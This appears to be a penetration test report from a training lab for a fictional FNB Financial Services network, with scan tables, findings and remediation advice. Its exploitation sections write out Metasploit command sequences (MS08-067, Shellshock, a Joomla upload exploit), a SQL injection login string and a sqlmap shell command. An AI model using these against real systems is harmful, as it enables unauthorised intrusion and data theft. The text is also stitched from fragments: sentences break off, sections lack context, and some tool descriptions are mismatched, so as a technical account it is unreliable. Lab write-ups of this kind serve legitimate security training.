YOUR NAME
THIS REPORT CONTAINS PROPRIETARY INFORMATION THAT IS NOT TO BE SHARED, COPIED, DISCLOSED OR OTHERWISE
DIVULGED WITHOUT THE EXPRESS WRITTEN CONSENT OF YOUR NAME OR THEIR DESIGNATED REPRESENTATIVE. USE
OF THIS REPORTING FORMAT BY OTHER THAN YOUR NAME OR ITS SUBSIDIARIES IS STRICTLY PROHIBITED AND MAY
BE PROSECUTED TO THE FULLEST EXTENT OF THE LAW.
Disclaimer: THE RECOMMENDATIONS CONTAINED IN THIS REPORT ARE BASED ON INDUSTRY STANDARD “BEST
PRACTICES”. BEST PRACTICES ARE, BY NECESSITY, GENERIC IN NATURE AND MAY NOT TAKE INTO ACCOUNT
EXACERBATING OR MITIGATING CIRCUMSTANCES. THESE RECOMMENDATIONS, EVEN IF CORRECTLY APPLIED, MAY
CAUSE CONFLICTS IN THE OPERATING SYSTEM OR INSTALLED APPLICATIONS. ANY RECOMMENDED CHANGES TO THE
OPERATING SYSTEM OR INSTALLED APPLICATION SHOULD FIRST BE EVALUATED IN A NON-PRODUCTION
ENVIRONMENT BEFORE BEING DEPLOYED IN YOUR PRODUCTION NETWORK.
YOUR NAME
HYDERABAD, INDIA - 500050
Document Details
Classification: Confidential
Version: v1.2
Reviewed By: Nityanand
Approved By: Nityanand
Revision history: July 3, 2016, v1.1, Your Name, Second draft, Added more content
Recipient:
Contact:
Phone: +91-9959043243
List of Tables
Table 1: Target System
Table 2: Timeline
Table 3: Severity Levels
Table 4: Summary of Findings
Table 5: Hosts and Operating Systems
Table 6: Open Ports and Services on Hosts
1.4. Assumptions
We assumed that all IP addresses are public IP addresses and that the organization has implemented the
security policies available to it.
1.5. Timeline
The timeline of the test is as below:
Categories                        Initiation Date/Time   Completion Date/Time
Footprinting and Reconnaissance   June 16, 2016          June 19, 2016
Network and Host Scanning         June 17, 2016          June 20, 2016
Enumeration                       June 21, 2016          June 23, 2016
Exploitation                      June 25, 2016          July 2, 2016
Post Exploitation                 July 3, 2016           July 5, 2016
Clean-up                          July 6, 2016           July 8, 2016
Table 2: Timeline
This General Opinion will discuss several overarching concerns that became apparent during the
Penetration Testing. This discussion is intended to provide more in-depth and detailed analysis of the
various issues brought forth in the Executive Summary and provides further illumination on the more
significant risks to FNB Financial Services.
1.8.3. Personnel
While organizations try to employ a litany of security controls and processes to avoid becoming
the victim of a security breach, human error is one factor that can't always be controlled or relied
upon. Weak passwords, insecure coding practices and insecure configurations can be avoided by
educating the personnel involved with FNB Financial Services.
While several people involved with maintaining the network and systems have expressed
concerns over the access given to entities (such as developers), the FNB Financial Services
security architecture does not provide, by design, any means of limiting these individuals' or
groups' network infrastructure access. FNB Financial Services tends to accept the risks
associated with having a completely open internal architecture in order to accommodate the
1.8.7. Conclusion
Regardless of the frequency of vulnerability testing, no critical system can be considered acceptably
protected unless both the network segments and the critical hosts/servers are monitored
constantly for signs of abuse and intrusion attempts. Because new exploits and vulnerabilities
within devices and network operating systems are discovered regularly, it is impossible to test a
network completely, giving 100 percent assurance of being impervious to penetration either from
within or from outside. Additionally, FNB Financial Services has chosen a trust model in which
the application of stronger internal controls is more difficult than in a more restrictive trust model.
Therefore, the easiest method of detecting misuse would be some type of intrusion detection
system that is network-based and can also do user profiling. Without appropriate identification
and authentication of users, referencing abuses to specific individuals becomes unreliable. Without
appropriate audit controls that ensure compliance with policies, the policies and procedures
themselves become untenable.
Your Name believes the corrective actions and recommendations in this report will improve FNB
Financial Services' ability to avoid breaches of information security. However, Your Name
strongly recommends that an Intrusion Detection and Identification and Authentication capability
be added to the network to detect misuse and intrusions and provide the information necessary
to support forensic investigations. It is also recommended that additional audit controls such as
compliance testing, independent log review, or configuration audits be implemented, with the
results of these controls incorporated with the results of the IDS capability. A policy and
procedure review, combined with a risk analysis, would also be very beneficial at this point in time
to streamline and reiterate those policies that are critical to the functioning of the enterprise. Web
applications should also be tested and patched for any security flaws.
Methodology:
We used nmap, nbtscan and zenmap for identifying hosts, open ports and the services running on those
ports.
We note that the systems are in the ranges 192.168.0.x, 10.xx.xxx.xxx, 172.xx.xxx.xxx and 172.xx.xxx.xxx, as shown
in figure 2 above.
We scanned the network using the Linux machine provided to us (IP address: 192.168.0.5).
1. Use nbtscan to find the hosts' IP addresses in the network.
We find that there are two series: 172.17.0.xxx and 172.19.19.xxx. Run nbtscan against both of them.
4. Using an nmap ping sweep, we find that 172.17.0.3 is also up; hence it is a Linux system.
5. The nmap ping sweep indicates that 172.19.19.5 is also up. Hence, it is a Linux system.
Now we have identified all the hosts given in the ECSA assignment, as shown in figure 10.
OPEN PORTS/SERVICES

10.10.0.2
  Open ports: 21, 80, 135, 139, 445, 3389, 47001, 49152, 49153, 49154, 49155, 49156, 49157
  Services: ftp, http (MS IIS httpd 7.5), msrpc, netbios-ssn, rdp (ms-wbt-server), MS HTTPAPI httpd 2.0

10.10.0.3
  Open ports: 21, 80, 135, 139, 445, 3306, 3389, 47001, 49152, 49153, 49154, 49155, 49156, 49157
  Services: ftp, http (MS IIS httpd 7.5), msrpc, MySQL, rdp (ms-wbt-server), netbios-ssn, MS HTTPAPI httpd 2.0

172.19.19.2
  Open ports: 21, 45, 80, 135, 139, 445, 3389, 49152, 49153, 49154, 49155, 49156, 49157
  Services: ftp, ssh (WeOnlyDo sshd 2.1.3), http, msrpc, rdp (ms-wbt-server), netbios-ssn

172.19.19.3
  Open ports: 21, 53, 80, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3389, 5357, 5722, 49152, 49153, 49154, 49155, 49157, 49158, 49161, 49165, 49170
  Services: ftp, dns (ms dns 6.0.6001), http (ms iis httpd 7.0), kerberos (port 88), msrpc, netbios-ssn, ldap, smb, kpasswd5, http-rpc-epmap (ncacn_http), rdp (ms-wbt-server), wsdapi

172.19.19.4
  Open ports: 21, 80, 135, 139, 445, 5357, 49152, 49153, 49154, 49155, 49156, 49157
  Services: ftp, http, msrpc, netbios-ssn, ms httpapi httpd 2.0

172.19.19.5
  Open ports: 21, 80
  Services: ftp, http

172.19.19.6
  Open ports: 21, 80, 135, 139, 445, 3306, 49152, 49153, 49154, 49155, 49156, 49157, 49158
  Services: ftp, apache httpd 2.4.2, msrpc, netbios-ssn, mysql

172.19.19.7
  Open ports: 21, 80, 135, 139, 445, 5357, 49152, 49153, 49154, 49155, 49156, 49157
  Services: ftp, ms iis httpd 7.0, msrpc, netbios-ssn, smb, ms httpapi httpd 2.0

172.19.19.8
  Open ports: 21, 135, 139, 445, 3389
  Services: ftp, msrpc, netbios-ssn, Microsoft-ds (smb), ms-wbt-server (rdp)

172.19.19.9
  Open ports: 21, 80, 135, 139, 445, 3306, 49152, 49153, 49154, 49155, 49156, 49157, 49158
  Services: ftp, apache httpd 2.4.2, msrpc, netbios-ssn, mysql, msrpc services

172.19.19.10
  Open ports: 21, 80, 135, 139, 445, 49152, 49153, 49154, 49155, 49156, 49157
  Services: ftp, ms iis httpd 7.5, netbios-ssn, msrpc services, ms-wbt-server (rdp)

GNAT ROUTER (192.168.0.1, 172.19.19.1, 172.17.0.1, 10.10.0.1)
  Open ports: 21, 135, 139, 445, 1025, 3389
  Services: ftp, msrpc, netbios-ssn, Microsoft-ds (smb), ms-wbt-server (rdp)

Table 6: Open ports and services on hosts
Recommendations:
1. Close the unnecessary services on the targeted systems. Permit only the traffic you need in order to
reach internal hosts, and filter it as far as possible from the hosts you are trying to protect.
Exploitability:
1. Some of the services on the open ports were exploited successfully to gain access to the
systems and to escalate privileges.
2. We could gain access to multiple hosts in the network.
4. Exploiting MS08-067
Open msfconsole in Kali Linux.
As the exploit is available in Metasploit, use the following commands, as shown in figure 18:
use exploit/windows/smb/ms08_067_netapi
set RHOST 172.19.19.8
exploit
Type exit to leave the shell and return to the meterpreter session, then download the required
document to the Kali machine.
Go to the /root/Desktop/downloads location in Kali Linux to find the hash of the document.
6. Challenge b
The b section of the challenge requires us to discover the "Personal" folder with large
images and find out whether these images contain sensitive data.
- Now we have to view these images with a steganography tool to find out whether any of these
images contain sensitive information.
- We decide to use the QuickStego tool, which is available on the Windows Server 2012 subnet A
machine.
- To copy the images to the Windows Server 2012 machine, we start the Apache server in Kali
Linux, host the image files on that server and download them on the Windows Server 2012
machine.
So, first we download the images in Kali Linux to the /var/www location, as this is the location from which we
host files on the Apache server. We create "/var/www/images" and download the images there.
3. dirb fuzzing
We run dirb to find hidden directories on the Ubuntu machine.
In Kali Linux:
msfconsole
use exploit/multi/http/apache_mod_cgi_bash_exec
set RHOST 172.19.19.5
set TARGETURI /cgi-bin/cinema
set payload linux/x86/meterpreter/bind_tcp
exploit
It will brute-force the usernames/passwords in the file provided and try to get a meterpreter session.
sessions -l will list the sessions obtained:
sessions -i 1 will connect to session 1
Let us find the FNB_Trading_Summary document and then find its hash:
When trying to access directories for other users, we get “access denied”
Impact:
The freesshd vulnerability leads to authentication bypass: an attacker can gain access to the
machine without a password, using the default username "root".
The impact is further increased by privilege escalation using local Windows exploits in Metasploit.
We could successfully connect to the remote desktop of the ACCOUNTS machine as a result of this
vulnerability.
Result Analysis:
WeOnlyDo sshd 2.1.3 (protocol 2.0) is vulnerable to a buffer overflow when handling a specially
crafted key exchange algorithm string received from an SSH client. When exploited, it leads to
complete system compromise.
Recommendations:
- Vulnerable software versions should be patched on a regular basis.
- Audits should be conducted regularly to find machines that are non-compliant, i.e. running unpatched
software. These should be patched immediately.
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
SQL injection refers to an injection attack wherein an attacker can execute malicious SQL statements
that control a web application’s database server. Since an SQL injection vulnerability could possibly
affect any website or web application that makes use of an SQL-based database, the vulnerability is
one of the oldest, most prevalent and most dangerous of web application vulnerabilities. It occurs
because of the un-validated user input being passed and processed by the web application. By
leveraging SQL injection vulnerability, given the right circumstances, an attacker can use it to bypass
a web application’s authentication and authorization mechanisms and retrieve the contents of an entire
database. SQL injection can also be used to add, modify and delete records in a database, affecting
data integrity. To such an extent, SQL injection can provide an attacker with unauthorized access to
sensitive data including customer data, personally identifiable information, trade secrets, intellectual
property and other sensitive information.
Cross-site Scripting (XSS) refers to a client-side code injection attack wherein an attacker can inject
malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web
application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a
web application makes use of unvalidated or unencoded user input within the output it generates.
By leveraging XSS, an attacker does not target a victim directly. Instead, an attacker would exploit a
vulnerability within a website or web application that the victim would visit, essentially using the
vulnerable website as a vehicle to deliver a malicious script to the victim’s browser. While XSS can be
taken advantage of within VBScript, ActiveX and Flash (although now considered legacy or even
obsolete), unquestionably, the most widely abused is JavaScript – primarily because JavaScript is
fundamental to most browsing experiences.
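The description above says XSS arises when "unvalidated or unencoded user input" is placed in the output. The following is an added example (not code from this report or from the FNB application) showing the difference between pasting a blog comment into HTML as-is and encoding it for the context it lands in. The comment string and the template fragments are constructed for the example; the blog software, the real template and the actual payload used in the test are not on this page.

```python
import html
from urllib.parse import quote

# Constructed sample comment: the kind of untrusted input a blog page renders back to other visitors.
SAMPLE_COMMENT = "<script>alert('xss')</script> nice post!"


def render_comment_unsafe(author, body):
    """Vulnerable pattern: user input is dropped straight into the HTML, so any markup in it is live."""
    return '<div class="comment"><b>%s</b>: %s</div>' % (author, body)


def render_comment_safe(author, body):
    """Hardened pattern: every untrusted value is HTML-encoded for the text context it is placed in.

    html.escape(quote=True) turns < > & " ' into entities, so the browser shows the
    characters instead of parsing them as tags or attributes.
    """
    return '<div class="comment"><b>%s</b>: %s</div>' % (
        html.escape(author, quote=True),
        html.escape(body, quote=True),
    )


def render_profile_link_safe(display_name, user_id):
    """Attribute and URL contexts need their own encoding, applied inside out.

    The id goes into a query string, so it is URL-encoded first; the resulting value
    and the display name are then HTML-encoded because they sit inside quoted attributes.
    """
    safe_id = html.escape(quote(str(user_id), safe=""), quote=True)
    safe_name = html.escape(display_name, quote=True)
    return '<a href="/profile?id=%s" title="%s">%s</a>' % (safe_id, safe_name, safe_name)


def contains_raw_tag(rendered, tag="script"):
    """Cheap regression check for templates: does a literal <tag> survive into the output?"""
    low = rendered.lower()
    return ("<%s" % tag) in low or ("</%s>" % tag) in low
```

`render_comment_unsafe("bob", SAMPLE_COMMENT)` keeps the `<script>` element intact, which is the injection the report's figure 72 shows in the page source; `render_comment_safe` emits `&lt;script&gt;...` instead, and `contains_raw_tag` can be used in a template test suite to catch any rendering path that regresses to the unsafe form. Encoding must be chosen per context (text node, attribute, URL), which is why the profile link encodes twice.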
Exploitation:
1. SQL Injection for www.fnb.com
- Log in to the Windows Server 2012 subnet A machine
- Open the Firefox browser
- Open www.fnb.com and press the login button
- Provide the username as rrr' or 1=1 --
- The addition of the or 1=1 -- condition causes the WHERE clause to always evaluate to
true, which leads to a successful login
Using parameter tampering in the URL, we could view the profiles of other users as well:
2. XSS Attack:
- Go to the Blog tab of www.fnb.com
- Figure 72 shows how the payload got injected into the page source:
Impact:
It allows the upload of arbitrary PHP files, leading to remote code execution.
Result Analysis:
We could successfully exploit the vulnerable “inboundio_marketing_file_upload” plugin and get the
access to the remote host. We could get the sensitive information on the remote host.
Recommendations:
1. Remove the vulnerable plugin if not required.
2. If the plugin is required, patch the software to get rid of the vulnerability.
Figure 85: set options for sshd exploit for ACCOUNTS machine
We got the meterpreter session using this exploit
Impact:
We could access the sensitive files such as group policy files in the target machine which can be used
for further exploits.
Result Analysis:
The machines which share the domain with the AD server should be secured. Even if one machine is
compromised, it can lead to the compromise of all the machines controlled by the Domain Controller.
A cache dump allowed us to crack the password for Jason, who is a common network user in the
domain.
Recommendations:
1. Patch all the machines in the domain for any security bugs and keep them updated.
2. Strong passwords should be used for all users.
3. The AD server should have secure configuration settings:
https://technet.microsoft.com/en-us/library/dn535497.aspx
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
SQL injection refers to an injection attack wherein an attacker can execute malicious SQL
statements that control a web application’s database server. Since an SQL injection vulnerability
could possibly affect any website or web application that makes use of an SQL-based database, the
vulnerability is one of the oldest, most prevalent and most dangerous of web application
vulnerabilities. By leveraging an SQL injection vulnerability, given the right circumstances, an
attacker can use it to bypass a web application’s authentication and authorization mechanisms and
retrieve the contents of an entire database. SQL injection can also be used to add, modify and delete
records in a database, affecting data integrity. To such an extent, SQL injection can provide an
attacker with unauthorized access to sensitive data including customer data, personally identifiable
information, trade secrets, intellectual property and other sensitive information.
The Xsecurity and moviescope sites are prone to SQL injection. We confirmed this by performing SQL
injection in their login forms and then running the SQLMAP tool to extract all the database
information as well as to get a shell on the host where SQL Server is running.
Exploitation:
1. Network Scanning:
Visit http://10.10.0.2/xsecurity
Try blind SQL injection for username:
To get the database version, let us open the shell through sqlmap in Kali Linux machine:
sqlmap -u http://10.10.0.2/moviescope/login.aspx --forms -p txtpwd -D Xsecurity --sql-shell
Recommendations:
To counter SQL injection attacks, you need to:
- Constrain and sanitize input data. Check for known good data by validating for type, length,
format, and range.
- Use type-safe SQL parameters for data access. You can use these parameters with stored
procedures or dynamically constructed SQL command strings. Parameter collections such
as SqlParameterCollection provide type checking and length validation. If you use a
parameters collection, input is treated as a literal value, and SQL Server does not treat it as
executable code. An additional benefit of using a parameters collection is that you can
enforce type and length checks. Values outside of the range trigger an exception. This is a
good example of defense in depth.
- Use an account that has restricted permissions in the database. Ideally, you should only grant
execute permissions to selected stored procedures in the database and provide no direct
table access.
- Avoid disclosing database error information. In the event of database errors, make sure you
do not disclose detailed error messages to the user.
Note: Conventional security measures, such as the use of Secure Sockets Layer (SSL) and IP Security
(IPSec), do not protect your application from SQL injection attacks.
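To make the first two recommendations concrete (constrain input, then bind it as a parameter), here is an added example that is not code from this report or from the FNB application. It uses Python's sqlite3 module as a stand-in for the SQL Server behind the login form (the binding mechanism is the same idea as SqlParameterCollection), a constructed in-memory users table, and the same rrr' or 1=1 -- string the report used against the login page, to show why concatenation fails and why the bound query does not.

```python
import re
import sqlite3


def make_db():
    """Constructed sample data for this example: an in-memory SQLite users table.

    Passwords are stored in clear text only to keep the example short; a real
    application stores password hashes.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "user"), ("admin", "hunter2", "admin")],
    )
    return conn


# The login string used in the report's test. Under string concatenation the
# "or 1=1" part rewrites the WHERE clause and "--" comments out the password check.
INJECTION = "rrr' or 1=1 --"


def login_vulnerable(conn, username, password):
    """Vulnerable pattern: user input is concatenated into the SQL text."""
    sql = (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Bound parameters: values travel separately from the statement, so the
    input is compared as a literal username and is never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Allow-list for usernames: type, length and format are all constrained here.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def login_safe(conn, username, password):
    """Defense in depth: validate the input first, then run the bound query."""
    if not isinstance(username, str) or not USERNAME_RE.match(username):
        return None
    if not isinstance(password, str) or not 1 <= len(password) <= 128:
        return None
    return login_parameterized(conn, username, password)
```

With the constructed table, `login_vulnerable(make_db(), INJECTION, "anything")` returns the first user row because the executed statement has become `... WHERE username = 'rrr' or 1=1`; `login_parameterized` returns None for the same input because it looks for a user literally named `rrr' or 1=1 --`, and `login_safe` rejects it before the database is ever queried. The restricted database account and the suppression of error messages from the remaining two recommendations are configuration matters on the server side and are not shown here.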
Let us find a Metasploit exploit for Joomla. We exploit joomla_media_upload_exec from Kali Linux:
msfconsole
search joomla
use exploit/unix/webapp/joomla_media_upload_exec
set payload php/meterpreter/bind_tcp
exploit
Impact:
The vulnerable web application can be exploited through arbitrary file upload, leading to remote code
execution.
We could successfully exploit the Joomla vulnerability, obtain a meterpreter session and perform
remote code execution. We could successfully read sensitive documents such as "RnD NDA.pdf".
Result Analysis:
The vulnerability in Joomla can lead to remote code execution and hence to the compromise of
the entire machine. In this challenge, we could compromise the RDDEPT machine.
Recommendations:
- Remove Joomla if not needed
- If needed by the web application, Joomla should be patched for any security
vulnerabilities and updated regularly.
Appendixes
Appendix B: Glossary
Black Box Penetration Test: Black Box testing is used when the organization desires to test internal or external
network security from the perspective of an outsider with no knowledge of the organization, other than that
which is in the public domain and freely available to anyone. The attacker has no advance knowledge of the
organization, except, perhaps, the name of the target. Black box testing most closely simulates what an
organization could expect from an outside attack in that, once any discovered vulnerability is exploited and
access to the network is gained, the attacker continues to exploit a specific vulnerability as far as possible,
with the ultimate goal of obtaining administrative-level access to the vulnerable machine or extending
network control to other machines. Because only the first successful vulnerability is exploited, other
vulnerabilities within the network go untested and may lead to a false sense of security. Attacks are carried
out as covertly as possible. Once the attacks are observed and reported by the target organization, black box
testing ceases. Black box testing is also referred to as "no knowledge testing." It is the most unreliable form
of penetration testing.

Crystal Box Penetration Test: Crystal Box testing is used when the organization desires to test internal or
external network security from the perspective of an attacker with full and complete knowledge of the
organization, similar to the knowledge possessed by an administrator. This knowledge normally includes
passwords for routers, firewalls and IDS systems, network topology, machine configurations and other
information that an IT administrator would possess. As many discovered vulnerabilities as possible are
exploited within the timeframe specified in the engagement letter. Attacks may be carried out overtly or
covertly, as the organization desires. Crystal box testing provides the most thorough assessment of the
security posture of the network, in that multiple attack avenues are pursued with detailed knowledge of the
organization. Crystal box testing is also referred to as "full knowledge testing" or "white box testing."

Grey Box Penetration Test: Grey Box testing is used when the organization desires to test internal or external
network security from the perspective of an attacker with only limited knowledge of the organization, similar
to the knowledge possessed by a non-IT employee. This knowledge normally includes machine names,
shared folder names, IP addresses, naming conventions and other information that a normal user with no
special access would know about the target organization. As many discovered vulnerabilities as possible are
exploited within the timeframe specified in the engagement letter. Attacks may be carried out overtly or
covertly, as the organization desires. Grey box testing assures a more thorough assessment of the security
posture of the network, in that several possible attack avenues are pursued. Grey box testing is also referred
to as "partial knowledge testing."

Internet Footprinting: Internet footprinting uses the Internet to search for information in the public domain
that could assist an attacker in gaining access to the target's network. While some information placed in the
public domain is required by law, regulation, or to assist in conducting business, excess information in the
public domain could result in an attacker gaining enough knowledge to conduct logical, physical or social
engineering attacks against the target. Expected results of Internet footprinting are: location addresses,
business hours, telephone and fax numbers, contact names and e-mail addresses; partners;
merger/acquisition news; privacy and security policies in place; links to other Web servers; employee names
and information; networking equipment used; Web pages using input forms, assigned IP address ranges and
Points of Contact, etc.

Penetration Test: The objective of penetration testing is to exploit discovered vulnerabilities to demonstrate
that specific vulnerabilities, present in the organization's network, can be used to compromise network
security. It uses intrusion techniques, identical or similar to methods used by attackers to breach network
security, collect data and elevate the attacker's privileges within the network. It can also reveal the extent to
which an organization's security incident response capability is alerted by observing the organization's
response to attack methodologies.

Vulnerability Assessment: The objective of vulnerability testing is to discover possible attack vectors that can
be used to compromise the target network. It is a systematic examination of an information system or
product to determine the adequacy of security measures, identify security deficiencies, provide data from
which to predict the effectiveness of proposed security measures, and confirm the adequacy of such
measures after implementation.